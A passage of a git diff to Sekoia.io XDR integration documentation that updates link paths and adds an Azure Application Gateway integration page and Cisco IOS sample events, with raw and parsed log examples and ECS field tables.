the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event.json" diff --git a/_shared_content/operations_center/integrations/generated/63974ce1-2f0a-44f7-a4cf-3e64787c1c39.md b/_shared_content/operations_center/integrations/generated/63974ce1-2f0a-44f7-a4cf-3e64787c1c39.md index 0a8756e074..9999c6beda 100644 --- a/_shared_content/operations_center/integrations/generated/63974ce1-2f0a-44f7-a4cf-3e64787c1c39.md +++ b/_shared_content/operations_center/integrations/generated/63974ce1-2f0a-44f7-a4cf-3e64787c1c39.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "sample.json" diff --git a/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889.md b/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889.md new file mode 100644 index 0000000000..9702d2d7c6 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889.md @@ -0,0 +1,274 @@ + +### Event Categories + + +The following table lists the data source offered by this integration. + +| Data Source | Description | +| ----------- | ------------------------------------ | +| `Web application firewall logs` | Azure Application Gateway protect web application with its web application firewall | +| `Web logs` | Web logs coming from Azure Application Gateway | + + + + + +In details, the following table denotes the type of events produced by this integration. + +| Name | Values | +| ---- | ------ | +| Kind | `` | +| Category | `network` | +| Type | `access`, `connection` | + + + + +### Transformed Events Samples after Ingestion + +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. + +=== "test_accesslog_1.json" + + ```json + + { + "message": "{\n\t\"resourceId\": \"/SUBSCRIPTIONS//RESOURCEGROUPS//PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/\",\n\t\"operationName\": \"ApplicationGatewayAccess\",\n\t\"time\": \"2016-04-11T04:24:37Z\",\n\t\"category\": \"ApplicationGatewayAccessLog\",\n\t\"properties\": {\n\t\t\"instanceId\":\"ApplicationGatewayRole_IN_0\",\n\t\t\"clientIP\":\"37.186.113.170\",\n\t\t\"clientPort\":\"12345\",\n\t\t\"httpMethod\":\"HEAD\",\n\t\t\"requestUri\":\"/xyz/portal\",\n\t\t\"requestQuery\":\"\",\n\t\t\"userAgent\":\"-\",\n\t\t\"httpStatus\":\"200\",\n\t\t\"httpVersion\":\"HTTP/1.0\",\n\t\t\"receivedBytes\":\"27\",\n\t\t\"sentBytes\":\"202\",\n\t\t\"timeTaken\":\"359\",\n\t\t\"sslEnabled\":\"off\"\n\t}\n}", + "event": { + "category": [ + "network" + ], + "dataset": "ApplicationGatewayAccess", + "type": [ + "access", + "connection" + ] + }, + "cloud": { + "instance": { + "id": "ApplicationGatewayRole_IN_0" + }, + "provider": "Azure", + "service": { + "name": "Azure Application Gateway" + } + }, + "destination": { + "bytes": 202 + }, + "http": { + "request": { + "method": "HEAD" + }, + "response": { + "status_code": 200 + } + }, + "network": { + "bytes": 27202 + }, + "related": { + "ip": [ + "37.186.113.170" + ] + }, + "source": { + "address": "37.186.113.170", + "bytes": 27, + "ip": "37.186.113.170", + "port": 12345 + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "-", + "os": { + "name": "Other" + } + } + } + + ``` + + +=== "test_accesslog_2.json" + + ```json + + { + "message": "{\n \"timeStamp\": \"2021-10-14T22:17:11+00:00\",\n \"resourceId\": \"/SUBSCRIPTIONS/{subscriptionId}/RESOURCEGROUPS/{resourceGroupName}/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/{applicationGatewayName}\",\n \"listenerName\": \"HTTP-Listener\",\n \"ruleName\": \"Storage-Static-Rule\",\n \"backendPoolName\": \"StaticStorageAccount\",\n \"backendSettingName\": \"StorageStatic-HTTPS-Setting\",\n \"operationName\": \"ApplicationGatewayAccess\",\n \"category\": \"ApplicationGatewayAccessLog\",\n \"properties\": {\n \"instanceId\": \"appgw_2\",\n \"clientIP\": \"185.42.129.24\",\n \"clientPort\": 45057,\n \"httpMethod\": \"GET\",\n \"originalRequestUriWithArgs\": \"\\/\",\n \"requestUri\": \"\\/\",\n \"requestQuery\": \"\",\n \"userAgent\": \"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\",\n \"httpStatus\": 200,\n \"httpVersion\": \"HTTP\\/1.1\",\n \"receivedBytes\": 184,\n \"sentBytes\": 466,\n \"clientResponseTime\": 0,\n \"timeTaken\": 0.034,\n \"WAFEvaluationTime\": \"0.000\",\n \"WAFMode\": \"Detection\",\n \"transactionId\": \"592d1649f75a8d480a3c4dc6a975309d\",\n \"sslEnabled\": \"on\",\n \"sslCipher\": \"ECDHE-RSA-AES256-GCM-SHA384\",\n \"sslProtocol\": \"TLSv1.2\",\n \"sslClientVerify\": \"NONE\",\n \"sslClientCertificateFingerprint\": \"\",\n \"sslClientCertificateIssuerName\": \"\",\n \"serverRouted\": \"52.239.221.65:443\",\n \"serverStatus\": \"200\",\n \"serverResponseLatency\": \"0.028\",\n \"upstreamSourcePort\": \"21564\",\n \"originalHost\": \"20.110.30.194\",\n \"host\": \"20.110.30.194\",\n \"error_info\":\"ERRORINFO_NO_ERROR\",\n \"contentType\":\"application/json\"\n }\n}", + "event": { + "category": [ + "network" + ], + "dataset": "ApplicationGatewayAccess", + "type": [ + "access", + "connection" + ] + }, + "@timestamp": "2021-10-14T22:17:11Z", + "azure": { + "application_gateway": { + "error_info": "ERRORINFO_NO_ERROR", + "serverStatus": "200", + "sslClientVerify": "NONE", + "transactionId": "592d1649f75a8d480a3c4dc6a975309d" + } + }, + "cloud": { + "instance": { + "id": "appgw_2" + }, + "provider": "Azure", + "service": { + "name": "Azure Application Gateway" + } + }, + "destination": { + "bytes": 466 + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "network": { + "bytes": 650 + }, + "related": { + "ip": [ + "185.42.129.24" + ] + }, + "source": { + "address": "185.42.129.24", + "bytes": 184, + "ip": "185.42.129.24", + "port": 45057 + }, + "url": { + "original": "/", + "path": "/" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", + "os": { + "name": "Windows", + "version": "7" + }, + "version": "52.0.2743" + } + } + + ``` + + +=== "test_fwlog_1.json" + + ```json + + { + "message": "{\n \"timeStamp\": \"2021-10-14T22:17:11+00:00\",\n \"resourceId\": \"/SUBSCRIPTIONS/{subscriptionId}/RESOURCEGROUPS/{resourceGroupName}/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/{applicationGatewayName}\",\n \"operationName\": \"ApplicationGatewayFirewall\",\n \"category\": \"ApplicationGatewayFirewallLog\",\n \"properties\": {\n \"instanceId\": \"appgw_2\",\n \"clientIp\": \"185.42.129.24\",\n \"clientPort\": \"\",\n \"requestUri\": \"\\/\",\n \"ruleSetType\": \"OWASP_CRS\",\n \"ruleSetVersion\": \"3.0.0\",\n \"ruleId\": \"920350\",\n \"message\": \"Host header is a numeric IP address\",\n \"action\": \"Matched\",\n \"site\": \"Global\",\n \"details\": {\n \"message\": \"Warning. Pattern match \\\\\\\"^[\\\\\\\\d.:]+$\\\\\\\" at REQUEST_HEADERS:Host .... \",\n \"data\": \"20.110.30.194:80\",\n \"file\": \"rules\\/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\n \"line\": \"791\"\n },\n \"hostname\": \"20.110.30.194:80\",\n \"transactionId\": \"592d1649f75a8d480a3c4dc6a975309d\",\n \"policyId\": \"default\",\n \"policyScope\": \"Global\",\n \"policyScopeName\": \"Global\"\n }\n}", + "event": { + "action": "Matched", + "category": [ + "network" + ], + "dataset": "ApplicationGatewayFirewall", + "reason": "Host header is a numeric IP address", + "type": [ + "access", + "connection" + ] + }, + "@timestamp": "2021-10-14T22:17:11Z", + "azure": { + "application_gateway": { + "details": { + "message": "Warning. Pattern match \\\"^[\\\\d.:]+$\\\" at REQUEST_HEADERS:Host .... " + }, + "message": "Host header is a numeric IP address", + "transactionId": "592d1649f75a8d480a3c4dc6a975309d" + } + }, + "cloud": { + "instance": { + "id": "appgw_2" + }, + "provider": "Azure", + "service": { + "name": "Azure Application Gateway" + } + }, + "destination": { + "address": "20.110.30.194", + "ip": "20.110.30.194", + "port": 80 + }, + "network": { + "bytes": 0 + }, + "related": { + "ip": [ + "185.42.129.24", + "20.110.30.194" + ] + }, + "source": { + "address": "185.42.129.24", + "ip": "185.42.129.24" + } + } + + ``` + + + + + +### Extracted Fields + +The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. + +| Name | Type | Description | +| ---- | ---- | ---------------------------| +|`@timestamp` | `date` | Date/time when the event originated. | +|`azure.application_gateway.details.message` | `keyword` | The details message. | +|`azure.application_gateway.error_info` | `keyword` | The error information. | +|`azure.application_gateway.message` | `keyword` | The application gateway message. | +|`azure.application_gateway.serverStatus` | `keyword` | The status of the server. | +|`azure.application_gateway.sslClientVerify` | `keyword` | The SSL client verification status. | +|`azure.application_gateway.transactionId` | `keyword` | The unique identifier for the transaction. | +|`cloud.instance.id` | `keyword` | Instance ID of the host machine. | +|`cloud.provider` | `keyword` | Name of the cloud provider. | +|`cloud.service.name` | `keyword` | The cloud service name. | +|`destination.bytes` | `long` | Bytes sent from the destination to the source. | +|`destination.ip` | `ip` | IP address of the destination. | +|`destination.port` | `long` | Port of the destination. | +|`event.action` | `keyword` | The action captured by the event. | +|`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | +|`event.dataset` | `keyword` | Name of the dataset. | +|`event.reason` | `keyword` | Reason why this event happened, according to the source | +|`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | +|`http.request.method` | `keyword` | HTTP request method. | +|`http.response.status_code` | `long` | HTTP response status code. | +|`network.bytes` | `long` | Total bytes transferred in both directions. | +|`source.bytes` | `long` | Bytes sent from the source to the destination. | +|`source.ip` | `ip` | IP address of the source. | +|`source.port` | `long` | Port of the source. | +|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | +|`user_agent.original` | `keyword` | Unparsed user_agent string. | + + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Azure/azure-application-gateway). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889_sample.md b/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889_sample.md new file mode 100644 index 0000000000..2dbb9cd23c --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/6967b0ca-f27e-480a-b124-fa4ab0b9d889_sample.md @@ -0,0 +1,123 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_accesslog_1" + + + ```json + { + "resourceId": "/SUBSCRIPTIONS//RESOURCEGROUPS//PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/", + "operationName": "ApplicationGatewayAccess", + "time": "2016-04-11T04:24:37Z", + "category": "ApplicationGatewayAccessLog", + "properties": { + "instanceId": "ApplicationGatewayRole_IN_0", + "clientIP": "37.186.113.170", + "clientPort": "12345", + "httpMethod": "HEAD", + "requestUri": "/xyz/portal", + "requestQuery": "", + "userAgent": "-", + "httpStatus": "200", + "httpVersion": "HTTP/1.0", + "receivedBytes": "27", + "sentBytes": "202", + "timeTaken": "359", + "sslEnabled": "off" + } + } + ``` + + + +=== "test_accesslog_2" + + + ```json + { + "timeStamp": "2021-10-14T22:17:11+00:00", + "resourceId": "/SUBSCRIPTIONS/{subscriptionId}/RESOURCEGROUPS/{resourceGroupName}/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/{applicationGatewayName}", + "listenerName": "HTTP-Listener", + "ruleName": "Storage-Static-Rule", + "backendPoolName": "StaticStorageAccount", + "backendSettingName": "StorageStatic-HTTPS-Setting", + "operationName": "ApplicationGatewayAccess", + "category": "ApplicationGatewayAccessLog", + "properties": { + "instanceId": "appgw_2", + "clientIP": "185.42.129.24", + "clientPort": 45057, + "httpMethod": "GET", + "originalRequestUriWithArgs": "/", + "requestUri": "/", + "requestQuery": "", + "userAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", + "httpStatus": 200, + "httpVersion": "HTTP/1.1", + "receivedBytes": 184, + "sentBytes": 466, + "clientResponseTime": 0, + "timeTaken": 0.034, + "WAFEvaluationTime": "0.000", + "WAFMode": "Detection", + "transactionId": "592d1649f75a8d480a3c4dc6a975309d", + "sslEnabled": "on", + "sslCipher": "ECDHE-RSA-AES256-GCM-SHA384", + "sslProtocol": "TLSv1.2", + "sslClientVerify": "NONE", + "sslClientCertificateFingerprint": "", + "sslClientCertificateIssuerName": "", + "serverRouted": "52.239.221.65:443", + "serverStatus": "200", + "serverResponseLatency": "0.028", + "upstreamSourcePort": "21564", + "originalHost": "20.110.30.194", + "host": "20.110.30.194", + "error_info": "ERRORINFO_NO_ERROR", + "contentType": "application/json" + } + } + ``` + + + +=== "test_fwlog_1" + + + ```json + { + "timeStamp": "2021-10-14T22:17:11+00:00", + "resourceId": "/SUBSCRIPTIONS/{subscriptionId}/RESOURCEGROUPS/{resourceGroupName}/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/{applicationGatewayName}", + "operationName": "ApplicationGatewayFirewall", + "category": "ApplicationGatewayFirewallLog", + "properties": { + "instanceId": "appgw_2", + "clientIp": "185.42.129.24", + "clientPort": "", + "requestUri": "/", + "ruleSetType": "OWASP_CRS", + "ruleSetVersion": "3.0.0", + "ruleId": "920350", + "message": "Host header is a numeric IP address", + "action": "Matched", + "site": "Global", + "details": { + "message": "Warning. Pattern match \\\"^[\\\\d.:]+$\\\" at REQUEST_HEADERS:Host .... ", + "data": "20.110.30.194:80", + "file": "rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf", + "line": "791" + }, + "hostname": "20.110.30.194:80", + "transactionId": "592d1649f75a8d480a3c4dc6a975309d", + "policyId": "default", + "policyScope": "Global", + "policyScopeName": "Global" + } + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/69b52166-b804-4f47-860f-2d3fd0b46987.md b/_shared_content/operations_center/integrations/generated/69b52166-b804-4f47-860f-2d3fd0b46987.md index 5251e4fe35..409d140e1b 100644 --- a/_shared_content/operations_center/integrations/generated/69b52166-b804-4f47-860f-2d3fd0b46987.md +++ b/_shared_content/operations_center/integrations/generated/69b52166-b804-4f47-860f-2d3fd0b46987.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_accesslog.json" diff --git a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md index 56255472fb..6d89584d41 100644 --- a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md +++ b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "cron.json" diff --git a/_shared_content/operations_center/integrations/generated/6c2a44e3-a86a-4d98-97a6-d575ffcb29f7.md b/_shared_content/operations_center/integrations/generated/6c2a44e3-a86a-4d98-97a6-d575ffcb29f7.md index 7888d570e0..43157371cb 100644 --- a/_shared_content/operations_center/integrations/generated/6c2a44e3-a86a-4d98-97a6-d575ffcb29f7.md +++ b/_shared_content/operations_center/integrations/generated/6c2a44e3-a86a-4d98-97a6-d575ffcb29f7.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "access_combined.json" diff --git a/_shared_content/operations_center/integrations/generated/6dbdd199-77ae-4705-a5de-5c2722fa020e.md b/_shared_content/operations_center/integrations/generated/6dbdd199-77ae-4705-a5de-5c2722fa020e.md index 20f9ff3724..e9c00bfc3b 100644 --- a/_shared_content/operations_center/integrations/generated/6dbdd199-77ae-4705-a5de-5c2722fa020e.md +++ b/_shared_content/operations_center/integrations/generated/6dbdd199-77ae-4705-a5de-5c2722fa020e.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_access_event.json" diff --git a/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206.md b/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206.md index e3df8101e7..79fee844c5 100644 --- a/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206.md +++ b/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_lineproto_down.json" @@ -158,6 +158,46 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_link_down_1.json" + + ```json + + { + "message": "Jul 3 2024 16:39:13 CEST: %LINK-3-UPDOWN: Interface GigabitEthernet2/0/14, changed state to down", + "event": { + "action": "down", + "category": [ + "host" + ], + "code": "UPDOWN", + "reason": "Interface GigabitEthernet2/0/14, changed state to down", + "severity": 3, + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-03T14:39:13Z", + "cisco": { + "ios": { + "event": { + "facility": "LINK" + }, + "observer": { + "interface": { + "name": "GigabitEthernet2/0/14" + } + } + } + }, + "observer": { + "product": "ios", + "vendor": "Cisco" + } + } + + ``` + + === "test_link_up.json" ```json @@ -359,6 +399,40 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_mab_fail.json" + + ```json + + { + "message": "Jul 3 2024 16:40:48: %MAB-5-FAIL: Authentication failed for client (0000.0000.0000) on Interface Gi2/0/7 AuditSessionID 0000000D0000000000000000", + "event": { + "category": [ + "host" + ], + "code": "FAIL", + "reason": "Authentication failed for client (0000.0000.0000) on Interface Gi2/0/7 AuditSessionID 0000000D0000000000000000", + "severity": 5, + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-03T16:40:48Z", + "cisco": { + "ios": { + "event": { + "facility": "MAB" + } + } + }, + "observer": { + "product": "ios", + "vendor": "Cisco" + } + } + + ``` + + === "test_sys_macflap.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206_sample.md b/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206_sample.md index cbbd07a3f8..c77957a308 100644 --- a/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206_sample.md +++ b/_shared_content/operations_center/integrations/generated/700f332f-d515-4bc5-8a62-49fa5f2c9206_sample.md @@ -28,6 +28,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_link_down_1" + + ``` + Jul 3 2024 16:39:13 CEST: %LINK-3-UPDOWN: Interface GigabitEthernet2/0/14, changed state to down + ``` + + + === "test_link_up" ``` @@ -60,6 +68,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_mab_fail" + + ``` + Jul 3 2024 16:40:48: %MAB-5-FAIL: Authentication failed for client (0000.0000.0000) on Interface Gi2/0/7 AuditSessionID 0000000D0000000000000000 + ``` + + + === "test_sys_macflap" ``` diff --git a/_shared_content/operations_center/integrations/generated/70c5c3db-fae8-4825-8d8b-08d6315e1ef6.md b/_shared_content/operations_center/integrations/generated/70c5c3db-fae8-4825-8d8b-08d6315e1ef6.md index 747a145733..5a4672e794 100644 --- a/_shared_content/operations_center/integrations/generated/70c5c3db-fae8-4825-8d8b-08d6315e1ef6.md +++ b/_shared_content/operations_center/integrations/generated/70c5c3db-fae8-4825-8d8b-08d6315e1ef6.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "storage_delete.json" diff --git a/_shared_content/operations_center/integrations/generated/76d767ed-5431-4db1-b893-a48b6903d871.md b/_shared_content/operations_center/integrations/generated/76d767ed-5431-4db1-b893-a48b6903d871.md index 402279da6a..8983c2d95a 100644 --- a/_shared_content/operations_center/integrations/generated/76d767ed-5431-4db1-b893-a48b6903d871.md +++ b/_shared_content/operations_center/integrations/generated/76d767ed-5431-4db1-b893-a48b6903d871.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_gateway_create.json" diff --git a/_shared_content/operations_center/integrations/generated/79029ef9-e5d3-44f3-b70f-fd3b54ba1fe4.md b/_shared_content/operations_center/integrations/generated/79029ef9-e5d3-44f3-b70f-fd3b54ba1fe4.md index deb3cf25d8..20483a6a71 100644 --- a/_shared_content/operations_center/integrations/generated/79029ef9-e5d3-44f3-b70f-fd3b54ba1fe4.md +++ b/_shared_content/operations_center/integrations/generated/79029ef9-e5d3-44f3-b70f-fd3b54ba1fe4.md @@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "alarm1.json" diff --git a/_shared_content/operations_center/integrations/generated/7954ae6f-eafa-404d-8e15-4b99a12b754c.md b/_shared_content/operations_center/integrations/generated/7954ae6f-eafa-404d-8e15-4b99a12b754c.md index 0c2ac474a0..5368c137f8 100644 --- a/_shared_content/operations_center/integrations/generated/7954ae6f-eafa-404d-8e15-4b99a12b754c.md +++ b/_shared_content/operations_center/integrations/generated/7954ae6f-eafa-404d-8e15-4b99a12b754c.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "dns.json" diff --git a/_shared_content/operations_center/integrations/generated/7a12aa3b-ec73-4ebb-8fb3-f7c543fd84a5.md b/_shared_content/operations_center/integrations/generated/7a12aa3b-ec73-4ebb-8fb3-f7c543fd84a5.md index 75e11e48bc..0a860b452d 100644 --- a/_shared_content/operations_center/integrations/generated/7a12aa3b-ec73-4ebb-8fb3-f7c543fd84a5.md +++ b/_shared_content/operations_center/integrations/generated/7a12aa3b-ec73-4ebb-8fb3-f7c543fd84a5.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective 